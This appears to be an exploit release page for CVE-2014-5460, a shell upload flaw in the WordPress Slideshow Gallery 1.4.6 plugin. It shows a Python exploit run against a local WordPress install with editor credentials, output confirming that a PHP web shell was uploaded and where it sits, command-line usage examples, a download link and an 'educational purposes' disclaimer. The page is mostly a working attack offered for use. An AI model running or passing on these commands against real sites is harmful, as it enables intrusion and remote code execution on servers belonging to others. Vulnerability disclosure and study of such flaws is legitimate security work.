[claudio@localhost ~]$ python wp_gallery_slideshow_146_suv.py -t http://localhost/wordpress -u editor -p editor -f sh33l.php
$$$$$$\ $$\ $$\ $$\ $$\
$$ __$$\ $$ |\__| $$ | $$ |
$$ / \__|$$ |$$\ $$$$$$$ | $$$$$$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$\ $$\ $$\
\$$$$$$\ $$ |$$ |$$ __$$ |$$ __$$\ $$ _____|$$ __$$\ $$ __$$\ $$ | $$ | $$ |
\____$$\ $$ |$$ |$$ / $$ |$$$$$$$$ |\$$$$$$\ $$ | $$ |$$ / $$ |$$ | $$ | $$ |
$$\ $$ |$$ |$$ |$$ | $$ |$$ ____| \____$$\ $$ | $$ |$$ | $$ |$$ | $$ | $$ |
\$$$$$$ |$$ |$$ |\$$$$$$$ |\$$$$$$$\ $$$$$$$ |$$ | $$ |\$$$$$$ |\$$$$$\$$$$ |
\______/ \__|\__| \_______| \_______|\_______/ \__| \__| \______/ \_____\____/
$$$$$$\ $$\ $$\ $$\ $$\ $$\ $$$$$$\
$$ __$$\ $$ |$$ | $$$$ |$$ | $$ | $$ __$$\
$$ / \__| $$$$$$\ $$ |$$ | $$$$$$\ $$$$$$\ $$\ $$\ \_$$ |$$ | $$ | $$ / \__|
$$ |$$$$\ \____$$\ $$ |$$ |$$ __$$\ $$ __$$\ $$ | $$ | $$ |$$$$$$$$ | $$$$$$$\
$$ |\_$$ | $$$$$$$ |$$ |$$ |$$$$$$$$ |$$ | \__|$$ | $$ | $$ |\_____$$ | $$ __$$\
$$ | $$ |$$ __$$ |$$ |$$ |$$ ____|$$ | $$ | $$ | $$ | $$ | $$ / $$ |
\$$$$$$ |\$$$$$$$ |$$ |$$ |\$$$$$$$\ $$ | \$$$$$$$ | $$$$$$\ $$\ $$ |$$\ $$$$$$ |
\______/ \_______|\__|\__| \_______|\__| \____$$ | \______|\__|\__|\__|\______/
$$\ $$ |
\$$$$$$ |
\______/
W0rdpr3ss Sl1d3sh04w G4ll3ry 1.4.6 Sh3ll Upl04d Vuln.
=============================================
- Release date: 2014-08-28
- Discovered by: Jesus Ramirez Pichardo
- CVE: 2014-5460
=============================================
Written by:
Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
[+] Username & password ACCEPTED!
[!] Shell Uploaded!
[+] Check url: http://localhost/wordpress/wp-content/uploads/slideshow-gallery/sh33l.php (lowercase!!!!)
Exploit Usage
python wp_gallery_slideshow_146_suv.py -t http[s]://localhost -u user -p pwd -f sh33l.php
python wp_gallery_slideshow_146_suv.py -t http[s]://localhost/dir -u user -p pwd -f sh33l.php
python wp_gallery_slideshow_146_suv.py -t http[s]://localhost:80|443 -u user -p pwd -f sh33l.php
Download
Download Exploit: HERE
Info
# WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit
# WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)
# Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/
# Exploit written by: Claudio Viviani - [email protected] - http://www.homelab.it
# Info:
# Any user could upload php files (administrator by default)
# Disclaimer:
# This exploit is intended for educational purposes only and the author
# can not be held liable for any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this exploit.
# In any case you disagree with the above statement,stop here.
# Requirements:
# 1) Enabled user for management slide
# 2) python's httplib2
# Installation: pip install httplib2